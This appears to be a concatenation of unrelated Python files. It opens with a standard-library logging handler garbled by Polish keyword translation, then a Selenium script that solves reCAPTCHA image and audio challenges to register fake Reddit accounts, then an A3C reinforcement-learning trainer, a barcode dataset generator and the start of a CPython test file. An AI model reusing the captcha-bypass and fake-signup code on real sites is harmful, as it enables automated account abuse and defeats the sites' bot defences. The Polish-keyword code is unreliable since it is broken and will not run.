You might want to override this method jeżeli you want to convert
the record to a dict albo JSON string, albo send a modified copy
of the record dopóki leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (jeżeli there's exception data), oraz also puts the message into
# record.message. We can then use this to replace the original
# msg + args, jako these might be unpickleable. We also zap the
# exc_info attribute, jako it's no longer needed and, jeżeli nie Nic,
# will typically nie be pickleable.
self.format(record)
record.msg = record.message
record.args = Nic
record.exc_info = Nic
zwróć record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it dla pickling first.
"""
spróbuj:
self.enqueue(self.prepare(record))
wyjąwszy Exception:
self.handleError(record)
jeżeli threading:
klasa QueueListener(object):
"""
This klasa implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them oraz dalejes them to a
list of handlers dla processing.
"""
_sentinel = Nic
def __init__(self, queue, *handlers, respect_handler_level=Nieprawda):
"""
Initialise an instance przy the specified queue oraz
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = Nic
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record oraz zwróć it, optionally blocking.
The base implementation uses get. You may want to override this method
jeżeli you want to use timeouts albo work przy custom queue implementations.
"""
zwróć self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(Prawda)
t.start()
def prepare(self , record):
"""
Prepare a record dla handling.
This method just returns the dalejed-in record. You may want to
override this method jeżeli you need to do any custom marshalling albo
manipulation of the record before dalejing it to the handlers.
"""
zwróć record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
dla handler w self.handlers:
jeżeli nie self.respect_handler_level:
process = Prawda
inaczej:
process = record.levelno >= handler.level
jeżeli process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue dla records, oraz ask the handler
to deal przy them.
This method runs on a separate, internal thread.
The thread will terminate jeżeli it sees a sentinel object w the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
dopóki nie self._stop.isSet():
spróbuj:
record = self.dequeue(Prawda)
jeżeli record jest self._sentinel:
przerwij
self.handle(record)
jeżeli has_task_done:
q.task_done()
wyjąwszy queue.Empty:
dalej
# There might still be records w the queue.
dopóki Prawda:
spróbuj:
record = self.dequeue(Nieprawda)
jeżeli record jest self._sentinel:
przerwij
self.handle(record)
jeżeli has_task_done:
q.task_done()
wyjąwszy queue.Empty:
przerwij
def enqueue_sentinel(self):
    """
    This is used to enqueue the sentinel record.

    The base implementation uses put_nowait. You may want to override this
    method if you want to use timeouts or work with custom queue
    implementations.
    """
    self.queue.put_nowait(self._sentinel)
def stop(self):
    """
    Stop the listener.

    This asks the thread to terminate, and then waits for it to do so.
    Note that if you don't call this before your application exits, there
    may be some records still left on the queue, which won't be processed.
    """
    self._stop.set()
    # Wake the monitor thread even if the queue is empty.
    self.enqueue_sentinel()
    self._thread.join()
    self._thread = Nic
|
main.py | from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium import webdriver
from bs4 import BeautifulSoup
from random import uniform
from time import sleep
from faker import Faker
from scipy.io import wavfile
import sys
import logging
import random
import os
import urllib
import time
import audio
import threading
import argparse
# use the max amplitude to filter out pauses
AMP_THRESHOLD = 2500
# Attack-mode flags; the defaults below are immediately overwritten by the
# parsed command-line arguments further down.
ATTACK_AUDIO = False
ATTACK_IMAGES = True
ATTACK_REDDIT = False
CHROMEDRIVER_PATH = ""
LEVEL = logging.DEBUG

# Command-line interface: choose exactly one of --image / --audio.
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument("--image", action='store_true', help="attack image recaptcha")
group.add_argument("--audio", action='store_true', help="attack audio recaptcha")
parser.add_argument("--driver", action="store", help="specify custom chromedriver path")
parser.add_argument("--reddit", action="store_true", help="run attack against Reddit's recaptcha")
parser.add_argument("--level", action="store", help="set log level", default="debug", choices=("debug", "warning"))
args = parser.parse_args()
ATTACK_IMAGES = args.image
ATTACK_AUDIO = args.audio
ATTACK_REDDIT = args.reddit
CHROMEDRIVER_PATH = args.driver
# NOTE(review): --level is parsed but never applied to LEVEL — confirm intent.
# Require at least one attack mode; otherwise show usage and quit.
if not ATTACK_AUDIO and not ATTACK_IMAGES:
    parser.print_help()
    sys.exit()
############################## UTIL FUNCTIONS #############################
def init(task_type):
    """Create the next free task directory ("task<N>") under *task_type*.

    Sets the module globals TASK_PATH, TASK_DIR, TASK_NUM and TASK so the
    rest of the script can write captcha payloads into a fresh directory.
    """
    global TASK_PATH, TASK_DIR, TASK_NUM, TASK
    TASK_DIR = os.path.join(task_type, "task")
    TASK_NUM = 1
    # Find the first task number whose directory does not exist yet.
    while os.path.isdir(TASK_DIR + str(TASK_NUM)):
        TASK_NUM += 1
    # The loop guarantees this directory is missing, so create it directly.
    # (The original re-checked os.path.isdir here, which was always true.)
    os.mkdir(TASK_DIR + str(TASK_NUM))
    logging.info("Making "+ TASK_DIR+str(TASK_NUM))
    TASK = "task" + str(TASK_NUM)
    TASK_PATH = os.path.join(task_type, TASK)
def wait_between(a, b):
    """Sleep for a random duration drawn uniformly from [a, b] seconds."""
    delay = uniform(a, b)
    sleep(delay)
############################## IMAGE RECAPTCHA ##############################
# Default task directory; overwritten by init() before any solving starts.
TASK_PATH = "images/taskg"
def should_click_image(img, x1, y1, store):
    """Decide whether the captcha tile at grid position (x1, y1) should be
    clicked, based on an image-recognition service's labels for *img*.

    The decision is recorded in *store* under key (x1, y1) so worker threads
    can share results (see handle_queue), and also returned.

    NOTE(review): `ris` is never defined or imported in this file —
    presumably a Clarifai-based recognition helper module; confirm the
    missing import.
    """
    ans = ris.parse_clarifai(ris.clarifai(img))
    logging.debug(ans)
    # Click if any vehicle-related label was detected.
    decision = "car" in ans or "vehicle" in ans or "truck" in ans
    store[(x1,y1)] = decision
    logging.debug(store)
    return decision
def click_tiles(driver, coords):
    """Click each (row, col) tile in *coords*, wait for reCAPTCHA to swap in
    a replacement image for each, and download the replacements.

    Returns a dict mapping (row, col) -> local path of the newly served
    tile image.
    """
    orig_srcs, new_srcs = {}, {}
    for (x, y) in coords:
        logging.debug("[*] Going to click {} {}".format(x,y))
        tile1 = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.XPATH, '//div[@id="rc-imageselect-target"]/table/tbody/tr[{0}]/td[{1}]'.format(x, y))))
        orig_srcs[(x, y)] = driver.find_element(By.XPATH, "//*[@id=\"rc-imageselect-target\"]/table/tbody/tr[{}]/td[{}]/div/div[1]/img".format(x,y)).get_attribute("src")
        new_srcs[(x, y)] = orig_srcs[(x, y)] # to check if image has changed
        tile1.click()
        wait_between(0.1, 0.5)
    logging.debug("[*] Downloading new inbound image...")
    new_files = {}
    for (x, y) in orig_srcs:
        # Poll until the tile's src attribute changes (new image served).
        while new_srcs[(x, y)] == orig_srcs[(x, y)]:
            new_srcs[(x, y)] = driver.find_element(By.XPATH, "//*[@id=\"rc-imageselect-target\"]/table/tbody/tr[{}]/td[{}]/div/div[1]/img".format(x,y)).get_attribute("src")
            time.sleep(0.5)
        # NOTE(review): urllib.urlretrieve is the Python 2 API
        # (urllib.request.urlretrieve in Python 3); this script targets Py2.
        urllib.urlretrieve(new_srcs[(x, y)], "captcha.jpeg")
        new_path = TASK_PATH+"/new_output{}{}.jpeg".format(x, y)
        os.system("mv captcha.jpeg "+new_path)
        new_files[(x, y)] = (new_path)
    return new_files
def handle_queue(to_solve_queue, coor_dict):
    """Classify every queued tile image on its own thread and wait for all
    classifications to finish; results land in *coor_dict*."""
    workers = [
        threading.Thread(target=should_click_image, args=(path, x, y, coor_dict))
        for (x, y), path in to_solve_queue.items()
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
def image_recaptcha(driver):
    """Solve the 3x3 'cars' image reCAPTCHA.

    Reloads challenges until an easy one appears (3x3 grid, target "cars"),
    downloads and crops the payload, classifies each tile in parallel, then
    keeps clicking tiles (and re-classifying their replacements) until the
    verifier accepts.
    """
    continue_solving = True
    while continue_solving:
        willing_to_solve = False
        while not willing_to_solve:
            body = driver.find_element(By.CSS_SELECTOR, "body").get_attribute('innerHTML').encode("utf8")
            soup = BeautifulSoup(body, 'html.parser')
            table = soup.findAll("div", {"id": "rc-imageselect-target"})[0]
            target = soup.findAll("div", {"class": "rc-imageselect-desc"})
            if not target: # find the target
                target = soup.findAll("div", {"class": "rc-imageselect-desc-no-canonical"})
            target = target[0].findAll("strong")[0].get_text()
            # Compute shape of captcha & target #
            trs = table.findAll("tr")
            max_height = len(trs)
            max_width = 0
            for tr in trs:
                imgs = tr.findAll("img")
                payload = imgs[0]["src"]
                if len(imgs) > max_width:
                    max_width = len(imgs)
            # if its not easy, ask for a new one
            if max_height != 3 or max_width != 3 or target != "cars": # lets get an easier one
                reload_captcha = driver.find_element(By.XPATH, "//*[@id=\"recaptcha-reload-button\"]")
                reload_captcha.click()
                wait_between(0.2, 0.5)
            else:
                willing_to_solve = True
        # Pull down catcha to attack and organize directory structure
        urllib.urlretrieve(payload, "captcha.jpeg")
        os.system("mv captcha.jpeg "+TASK_PATH+"/full_payload.jpeg")
        # Crop the payload into a grid of tiles with ImageMagick.
        os.system("convert "+TASK_PATH+"/full_payload.jpeg -crop "+str(max_width)+"x"+str(max_width)+"@ +repage +adjoin "+TASK_PATH+"/output_%03d.jpg")
        # build queue of files
        to_solve_queue = {}
        idx = 0
        for f in [TASK_PATH+"/"+f for f in os.listdir(TASK_PATH) if "output_" in f]:
            y = idx % 3 + 1 # making coordinates 1 indexed to match xpaths
            # NOTE(review): relies on Python 2 integer division ("/").
            x = idx / 3 + 1
            to_solve_queue[(x, y)] = f
            idx += 1
        logging.debug(to_solve_queue)
        coor_dict = {}
        handle_queue(to_solve_queue, coor_dict) # multithread builds out where to click
        logging.debug(coor_dict)
        #os.system("rm "+TASK_PATH+"/full_payload.jpeg")
        driver.switch_to.default_content()
        iframe = driver.find_element(By.XPATH, "/html/body/div/div[4]/iframe")
        driver.switch_to.frame(iframe)
        continue_solving = True
        while continue_solving:
            to_click_tiles = []
            for coords in coor_dict:
                to_click = coor_dict[coords]
                x, y = coords
                body = driver.find_element(By.CSS_SELECTOR, "body").get_attribute('innerHTML').encode("utf8")
                if to_click:
                    to_click_tiles.append((x,y)) # collect all the tiles to click in this round
            new_files = click_tiles(driver, to_click_tiles)
            handle_queue(new_files, coor_dict)
            continue_solving = False
            # Keep going as long as any tile is still marked clickable.
            for to_click_tile in coor_dict.values():
                continue_solving = to_click_tile or continue_solving
            driver.find_element(By.ID, "recaptcha-verify-button").click()
            wait_between(0.2, 0.5)
            if driver.find_element_by_class_name("rc-imageselect-incorrect-response").get_attribute("style") != "display: none":
                continue_solving = True
            else:
                print "Think I'm done here!"
############################## AUDIO RECAPTCHA ##############################
def test_all(start=100, end=101):
    """Offline benchmark: run get_numbers over saved audio tasks
    data/task<start>..data/task<end-1>, printing per-task results and the
    average solve time."""
    global TASK_PATH
    TASK_TYPE = "data"
    timings = []
    for task_num in range(start, end):
        try:
            TASK = "task"+str(task_num)
            TASK_PATH = TASK_TYPE+"/"+TASK
            AUDIO_FILE = TASK_PATH+"/"+TASK #+ ".mp3"
            # NOTE(review): `time` here shadows the imported time module
            # within this function.
            num_str, time = get_numbers(AUDIO_FILE, TASK_PATH+"/")
            print(num_str, time)
            timings.append(time)
        except:
            # NOTE(review): bare except silently skips any failing task.
            pass
    print timings
    print sum(timings)/float(len(timings))
def get_numbers(audio_file, parent_dir):
    """Convert a downloaded reCAPTCHA audio challenge into digits.

    audio_file: path prefix of the task audio (without extension).
    parent_dir: directory containing the task's files (with trailing '/').

    Pipeline: mp3 -> wav (ffmpeg), split on silence (sox), drop near-silent
    segments, then hand the remaining per-digit clips to the speech
    recogniser. Returns whatever audio.getNums returns (presumably the
    digit string, possibly with timing — see test_all; confirm).
    """
    global AMP_THRESHOLD
    mp3_file = audio_file + ".mp3"
    wav_file = audio_file + ".wav"
    print("converting from " + mp3_file + " to " + wav_file)
    # NOTE(review): shell commands built by string concatenation; paths with
    # spaces or metacharacters would break or inject.
    os.system("echo 'y' | ffmpeg -i "+mp3_file+" "+wav_file + "&> /dev/null")
    # split audio file on silence
    os.system("sox -V3 "+wav_file+" "+audio_file+"_.wav silence -l 0 1 0.5 0.1% : newfile : restart &> /dev/null")
    files = [f for f in os.listdir(parent_dir) if "_0" in f]
    audio_filenames = []
    # remove audio files that are only silence
    for f in files:
        # NOTE(review): mixes the TASK_PATH global with the parent_dir
        # parameter; equivalent only when parent_dir == TASK_PATH + "/".
        _, snd = wavfile.read(TASK_PATH + "/" + f)
        amp = max(snd)
        print(f + ":" + str(amp))
        if amp > AMP_THRESHOLD: # keep: loud enough to contain speech
            audio_filenames.append(parent_dir+f)
        else:
            os.system("rm " + parent_dir+f)
    # run speech recognition on the individual numbers
    # num_str = ""
    # for f in sorted(audio_filenames):
    # print f
    # num_str += str(audio.getNum(f))
    # print(num_str)
    return audio.getNums(TASK_PATH, audio_filenames)
def type_like_bot(driver, element, string):
    """Type *string* into the element with id *element* in one burst, then
    pause briefly (obviously non-human input timing)."""
    field = driver.find_element(By.ID, element)
    field.send_keys(string)
    wait_between(0.5, 2)
def type_like_human(driver, element, string):
    """Type *string* one character at a time with small random pauses, to
    mimic human keystroke timing."""
    driver.find_element(By.ID, element).click()
    for ch in string:
        driver.find_element(By.ID, element).send_keys(ch)
        wait_between(0.0, 0.1)
    wait_between(0.5, 2)
# Typing strategy used when filling forms; swap to type_like_human to mimic
# human keystroke timing.
type_style = type_like_bot
def fill_out_profile(driver):
    """Fill Reddit's registration form with a randomly generated identity."""
    fake = Faker()
    profile = fake.simple_profile()
    username = profile["username"]
    # De-duplicate the generated address by injecting a random 5-digit tag.
    tag = str(random.randint(10000, 99999))
    email = profile["mail"].replace("@", tag + "@")
    password = fake.password()
    wait_between(1, 2)
    type_style(driver, "user_reg", username)
    type_style(driver, "passwd_reg", password)
    type_style(driver, "passwd2_reg", password)
    type_style(driver, "email_reg", email)
############################## MAIN ##############################
def main():
    """End-to-end driver: launch Chrome, navigate to a page hosting
    reCAPTCHA (Reddit registration or the local test page), click the
    checkbox, then run the image or audio solver selected on the CLI.
    """
    logging.basicConfig(stream=sys.stderr, level=LEVEL)
    # Harden the browser profile a little against trivial bot detection.
    chrome_options = webdriver.ChromeOptions()
    chrome_options.add_argument("--disable-bundled-ppapi-flash")
    chrome_options.add_argument("--incognito")
    chrome_options.add_argument("user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36")
    chrome_options.add_argument("--disable-plugins-discovery")
    if CHROMEDRIVER_PATH:
        driver = webdriver.Chrome(CHROMEDRIVER_PATH, chrome_options=chrome_options)
        logging.debug("[*] Starting custom chromedriver %s" % CHROMEDRIVER_PATH)
    else:
        driver = webdriver.Chrome(chrome_options=chrome_options)
        logging.debug("[*] Starting system default chromedriver")
    # BUG FIX: the original unconditionally created a second
    # webdriver.Chrome(...) here, leaking the browser chosen above and
    # discarding any custom chromedriver path. The browser is now created
    # exactly once in the if/else above.
    driver.delete_all_cookies()
    agent = driver.execute_script("return navigator.userAgent")
    logging.debug("[*] Cookies cleared")
    logging.debug("[ ] Starting driver with user agent %s" % agent)
    if ATTACK_REDDIT:
        logging.info("[*] Starting attack on Reddit's recaptcha")
        driver.get("http://reddit.com")
        driver.find_element(By.XPATH, "//*[@id=\"header-bottom-right\"]/span[1]/a").click()
        logging.debug("[*] Filling out Reddit registration form")
        fill_out_profile(driver)
        WebDriverWait(driver, 60).until(EC.visibility_of_element_located((By.XPATH, "//*[@id=\"register-form\"]/div[6]/div/div/div/iframe")))
        iframeSwitch = driver.find_element(By.XPATH, "//*[@id=\"register-form\"]/div[6]/div/div/div/iframe")
    else:
        logging.info("[*] Starting attack on local site")
        driver.get("localhost:8000/site.html")
        iframeSwitch = driver.find_element(By.XPATH, "//*[@id=\"captcha\"]/div/div/iframe")
    driver.delete_all_cookies()
    driver.switch_to.frame(iframeSwitch)
    #ActionChains(driver).move_to_element(iframeSwitch).perform()
    driver.delete_all_cookies()
    logging.info("[*] Recaptcha located. Engaging")
    WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.ID, "recaptcha-anchor")))
    ele = driver.find_element(By.ID, "recaptcha-anchor")
    #ActionChains(driver).move_to_element(ele).perform()
    ele.click()
    driver.switch_to.default_content()
    WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.CSS_SELECTOR, "iframe[title=\"recaptcha challenge\"]")))
    iframe = driver.find_element(By.CSS_SELECTOR, "iframe[title=\"recaptcha challenge\"]")
    driver.switch_to.frame(iframe)
    WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.ID, "rc-imageselect")))
    if ATTACK_IMAGES:
        image_recaptcha(driver)
    elif ATTACK_AUDIO:
        WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.ID, "recaptcha-audio-button")))
        time.sleep(1)
        driver.find_element(By.ID, "recaptcha-audio-button").click()
        guess_again = True
        while guess_again:
            init("audio")
            WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.ID, "audio-source")))
            # Parse table details offline
            body = driver.find_element(By.CSS_SELECTOR, "body").get_attribute('innerHTML').encode("utf8")
            soup = BeautifulSoup(body, 'html.parser')
            link = soup.findAll("a", {"class": "rc-audiochallenge-tdownload-link"})[0]
            urllib.urlretrieve(link["href"], TASK_PATH + "/" + TASK + ".mp3")
            guess_str = get_numbers(TASK_PATH + "/" + TASK, TASK_PATH + "/")
            type_style(driver, "audio-response", guess_str)
            # results.append(guess_str)
            wait_between(0.5, 3)
            driver.find_element(By.ID, "recaptcha-verify-button").click()
            wait_between(1, 2.5)
            try:
                logging.debug("Checking if Google wants us to solve more...")
                driver.switch_to.default_content()
                driver.switch_to.frame(iframeSwitch)
                # A checked checkbox sprite at this offset means success.
                checkmark_pos = driver.find_element(By.CLASS_NAME, "recaptcha-checkbox-checkmark").get_attribute("style")
                guess_again = not (checkmark_pos == "background-position: 0 -600px")
                driver.switch_to.default_content()
                iframe = driver.find_element(By.CSS_SELECTOR, "iframe[title=\"recaptcha challenge\"]")
                driver.switch_to.frame(iframe)
            except Exception as e:
                # BUG FIX: was Python 2 `print e`; use the function form.
                print(e)
                guess_again = False
    input("")  # keep the browser open until the operator presses Enter
# Script entry point (the original has no __main__ guard).
main()
# test_all()
|
A3C.py | """
Asynchronous Advantage Actor Critic (A3C), Reinforcement Learning.
The BipedalWalker example.
View more on [莫烦Python] : https://morvanzhou.github.io/2_tensorflow_old/
Using:
tensorflow 1.8.0
gym 0.10.5
"""
import multiprocessing
import threading
import tensorflow as tf
import numpy as np
import gym
import os
import shutil
GAME = 'BipedalWalker-v2'
OUTPUT_GRAPH = False            # whether to dump the TF graph for TensorBoard
LOG_DIR = './log'
N_WORKERS = multiprocessing.cpu_count()   # one worker thread per CPU core
MAX_GLOBAL_EP = 8000            # total episodes across all workers
GLOBAL_NET_SCOPE = 'Global_Net'
UPDATE_GLOBAL_ITER = 10         # push/pull to the global net every N steps
GAMMA = 0.99                    # reward discount factor
ENTROPY_BETA = 0.005            # entropy bonus weight (exploration)
LR_A = 0.00005    # learning rate for actor
LR_C = 0.0001     # learning rate for critic
GLOBAL_RUNNING_R = []           # smoothed episode rewards, shared across workers
GLOBAL_EP = 0                   # shared episode counter (unsynchronized)

# Probe the environment once for its space shapes, then discard it.
env = gym.make(GAME)
N_S = env.observation_space.shape[0]
N_A = env.action_space.shape[0]
A_BOUND = [env.action_space.low, env.action_space.high]
del env
class ACNet(object):
    """Actor-critic network (TF1 graph code).

    The GLOBAL_NET_SCOPE instance only holds parameters; each worker builds
    a local copy plus loss, gradient and sync (push/pull) ops against the
    global net.
    """
    def __init__(self, scope, globalAC=None):
        if scope == GLOBAL_NET_SCOPE:   # get global network
            with tf.variable_scope(scope):
                self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
                self._build_net()
                self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
                self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
        else:   # local net, calculate losses
            with tf.variable_scope(scope):
                self.s = tf.placeholder(tf.float32, [None, N_S], 'S')
                self.a_his = tf.placeholder(tf.float32, [None, N_A], 'A')
                self.v_target = tf.placeholder(tf.float32, [None, 1], 'Vtarget')
                mu, sigma, self.v = self._build_net()
                td = tf.subtract(self.v_target, self.v, name='TD_error')
                with tf.name_scope('c_loss'):
                    self.c_loss = tf.reduce_mean(tf.square(td))
                with tf.name_scope('wrap_a_out'):
                    # Exposed for debugging; printed as '| var' by Worker.work.
                    self.test = sigma[0]
                    # Scale mean into action range; keep sigma strictly positive.
                    mu, sigma = mu * A_BOUND[1], sigma + 1e-5
                normal_dist = tf.contrib.distributions.Normal(mu, sigma)
                with tf.name_scope('a_loss'):
                    log_prob = normal_dist.log_prob(self.a_his)
                    exp_v = log_prob * td
                    entropy = normal_dist.entropy()  # encourage exploration
                    self.exp_v = ENTROPY_BETA * entropy + exp_v
                    self.a_loss = tf.reduce_mean(-self.exp_v)
                with tf.name_scope('choose_a'):  # use local params to choose action
                    self.A = tf.clip_by_value(tf.squeeze(normal_dist.sample(1)), *A_BOUND)
                with tf.name_scope('local_grad'):
                    self.a_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/actor')
                    self.c_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=scope + '/critic')
                    self.a_grads = tf.gradients(self.a_loss, self.a_params)
                    self.c_grads = tf.gradients(self.c_loss, self.c_params)
            with tf.name_scope('sync'):
                with tf.name_scope('pull'):
                    self.pull_a_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.a_params, globalAC.a_params)]
                    self.pull_c_params_op = [l_p.assign(g_p) for l_p, g_p in zip(self.c_params, globalAC.c_params)]
                with tf.name_scope('push'):
                    self.update_a_op = OPT_A.apply_gradients(zip(self.a_grads, globalAC.a_params))
                    self.update_c_op = OPT_C.apply_gradients(zip(self.c_grads, globalAC.c_params))

    def _build_net(self):
        # Two hidden layers each for actor and critic; actor outputs a
        # Gaussian policy (mu, sigma), critic outputs the state value.
        w_init = tf.contrib.layers.xavier_initializer()
        with tf.variable_scope('actor'):
            l_a = tf.layers.dense(self.s, 500, tf.nn.relu6, kernel_initializer=w_init, name='la')
            l_a = tf.layers.dense(l_a, 300, tf.nn.relu6, kernel_initializer=w_init, name='la2')
            mu = tf.layers.dense(l_a, N_A, tf.nn.tanh, kernel_initializer=w_init, name='mu')
            sigma = tf.layers.dense(l_a, N_A, tf.nn.softplus, kernel_initializer=w_init, name='sigma')
        with tf.variable_scope('critic'):
            l_c = tf.layers.dense(self.s, 500, tf.nn.relu6, kernel_initializer=w_init, name='lc')
            l_c = tf.layers.dense(l_c, 300, tf.nn.relu6, kernel_initializer=w_init, name='lc2')
            v = tf.layers.dense(l_c, 1, kernel_initializer=w_init, name='v') # state value
        return mu, sigma, v

    def update_global(self, feed_dict): # run by a local
        _, _, t = SESS.run([self.update_a_op, self.update_c_op, self.test], feed_dict) # local grads applies to global net
        return t

    def pull_global(self): # run by a local
        SESS.run([self.pull_a_params_op, self.pull_c_params_op])

    def choose_action(self, s): # run by a local
        s = s[np.newaxis, :]
        return SESS.run(self.A, {self.s: s})
class Worker(object):
    """One A3C worker: owns a private gym env and a local ACNet that is
    periodically synchronized with the global net."""
    def __init__(self, name, globalAC):
        self.env = gym.make(GAME)
        self.name = name
        self.AC = ACNet(name, globalAC)

    def work(self):
        global GLOBAL_RUNNING_R, GLOBAL_EP
        total_step = 1
        buffer_s, buffer_a, buffer_r = [], [], []
        while not COORD.should_stop() and GLOBAL_EP < MAX_GLOBAL_EP:
            s = self.env.reset()
            ep_r = 0
            while True:
                # Only one worker renders, and only occasionally.
                if self.name == 'W_0' and total_step % 30 == 0:
                    self.env.render()
                a = self.AC.choose_action(s)
                s_, r, done, info = self.env.step(a)
                if r == -100: r = -2   # soften BipedalWalker's fall penalty
                ep_r += r
                buffer_s.append(s)
                buffer_a.append(a)
                buffer_r.append(r)
                if total_step % UPDATE_GLOBAL_ITER == 0 or done: # update global and assign to local net
                    if done:
                        v_s_ = 0 # terminal
                    else:
                        v_s_ = SESS.run(self.AC.v, {self.AC.s: s_[np.newaxis, :]})[0, 0]
                    # Bootstrapped n-step discounted returns, built backwards.
                    buffer_v_target = []
                    for r in buffer_r[::-1]: # reverse buffer r
                        v_s_ = r + GAMMA * v_s_
                        buffer_v_target.append(v_s_)
                    buffer_v_target.reverse()
                    buffer_s, buffer_a, buffer_v_target = np.vstack(buffer_s), np.vstack(buffer_a), np.vstack(buffer_v_target)
                    feed_dict = {
                        self.AC.s: buffer_s,
                        self.AC.a_his: buffer_a,
                        self.AC.v_target: buffer_v_target,
                    }
                    test = self.AC.update_global(feed_dict)
                    buffer_s, buffer_a, buffer_r = [], [], []
                    self.AC.pull_global()
                s = s_
                total_step += 1
                if done:
                    achieve = '| Achieve' if self.env.unwrapped.hull.position[0] >= 88 else '| -------'
                    if len(GLOBAL_RUNNING_R) == 0: # record running episode reward
                        GLOBAL_RUNNING_R.append(ep_r)
                    else:
                        # Exponential moving average of episode rewards.
                        GLOBAL_RUNNING_R.append(0.95 * GLOBAL_RUNNING_R[-1] + 0.05 * ep_r)
                    print(
                        self.name,
                        "Ep:", GLOBAL_EP,
                        achieve,
                        "| Pos: %i" % self.env.unwrapped.hull.position[0],
                        "| RR: %.1f" % GLOBAL_RUNNING_R[-1],
                        '| EpR: %.1f' % ep_r,
                        '| var:', test,
                    )
                    GLOBAL_EP += 1
                    break
if __name__ == "__main__":
    """Build the global net and one worker per core, train, then plot."""
    SESS = tf.Session()
    with tf.device("/cpu:0"):
        OPT_A = tf.train.RMSPropOptimizer(LR_A, name='RMSPropA')
        OPT_C = tf.train.RMSPropOptimizer(LR_C, name='RMSPropC')
        GLOBAL_AC = ACNet(GLOBAL_NET_SCOPE) # we only need its params
        workers = []
        # Create worker
        for i in range(N_WORKERS):
            i_name = 'W_%i' % i # worker name
            workers.append(Worker(i_name, GLOBAL_AC))
    COORD = tf.train.Coordinator()
    SESS.run(tf.global_variables_initializer())
    worker_threads = []
    for worker in workers:
        # BUG FIX: the original used `job = lambda: worker.work()`, a
        # late-binding closure over the loop variable — any thread whose
        # lambda ran after the loop advanced would execute the *latest*
        # worker (duplicating one and skipping others). Pass the bound
        # method directly instead.
        t = threading.Thread(target=worker.work)
        t.start()
        worker_threads.append(t)
    COORD.join(worker_threads)
    import matplotlib.pyplot as plt
    plt.plot(GLOBAL_RUNNING_R)
    plt.xlabel('episode')
    plt.ylabel('global running reward')
    plt.show()
|
generate_clean_barcodes.py | from tqdm import tqdm
import pickle
import numpy as np
import treepoem
import string
import random
import argparse
import multiprocessing as mp
# Command-line options for parallel dataset generation.
parser = argparse.ArgumentParser(description='Generate clean barcodes.')
parser.add_argument('--num_processes', '-n', type=int, default=6,
                    help='Number of processes used for image generation')
parser.add_argument('--size', '-s', type=int, default=30000,
                    help='Number of training images to be generated')
args = parser.parse_args()
def createCleanBarcode(codeType='random'):
    """Render one clean (noise-free) barcode image.

    codeType: one of 'upca', 'ean13', 'qrcode', 'pdf417', or 'random' to
    pick a type uniformly at random. The payload is a random digit string
    of the length the chosen symbology requires.

    Returns a 2-D numpy int array with values 0 (black) and 255 (white).
    """
    # Per-type payload length; H/W record the nominal rendered size.
    barcode_types = {
        'upca':{'size':11, 'H':146, 'W':190},
        'ean13':{'size':12, 'H':146, 'W':190},
        'qrcode':{'size':50, 'H':102, 'W':102},
        'pdf417':{'size':50, 'H':62, 'W':242}
    }
    if codeType == 'random':
        codeType = np.random.choice(list(barcode_types))
    letters = string.digits
    data = ''.join(random.choice(letters) for i in range(barcode_types[codeType]['size']))
    # '1' = 1-bit black & white PIL mode.
    generated = treepoem.generate_barcode(barcode_type=codeType, data=data).convert('1')
    # convert PIL Image to array.
    # BUG FIX: np.int was deprecated in NumPy 1.20 and removed in 1.24;
    # the builtin int is the documented replacement and is what np.int
    # aliased all along.
    arr = np.array(generated).astype(int)
    arr[arr==1] = 255
    return arr
def generate(ind, length):
    """Worker entry point: render *length* clean barcodes and pickle the
    list to clean_barcodes_<ind>.pickle."""
    barcodes = [createCleanBarcode() for _ in tqdm(range(length))]
    with open("clean_barcodes_{}.pickle".format(ind), 'wb') as f:
        pickle.dump(barcodes, f)
if __name__ == '__main__':
    # Split the workload evenly across processes.
    # NOTE(review): integer division drops the remainder, so fewer than
    # args.size images are produced when size % num_processes != 0.
    step = args.size // args.num_processes
    processes = []
    for i in range(args.num_processes):
        processes.append(mp.Process(target=generate, args=(i, step, )))
    for p in processes:
        p.start()
    for p in processes:
        p.join()
    # Merge the per-process pickles into a single dataset file.
    all_barcodes = []
    for i in range(args.num_processes):
        with open("clean_barcodes_{}.pickle".format(i), 'rb') as f:
            all_barcodes += pickle.load(f)
    with open("clean_barcodes.pickle", 'wb') as f:
        pickle.dump(all_barcodes, f)
    print("Data generation finished.")
test_sys.py | import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
from test import support
from test.support import os_helper
from test.support.script_helper import assert_python_ok, assert_python_failure
from test.support import threading_helper
from test.support import import_helper
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0

# struct format string for a dict-keys object header
# NOTE(review): layout must match CPython internals — confirm before reuse.
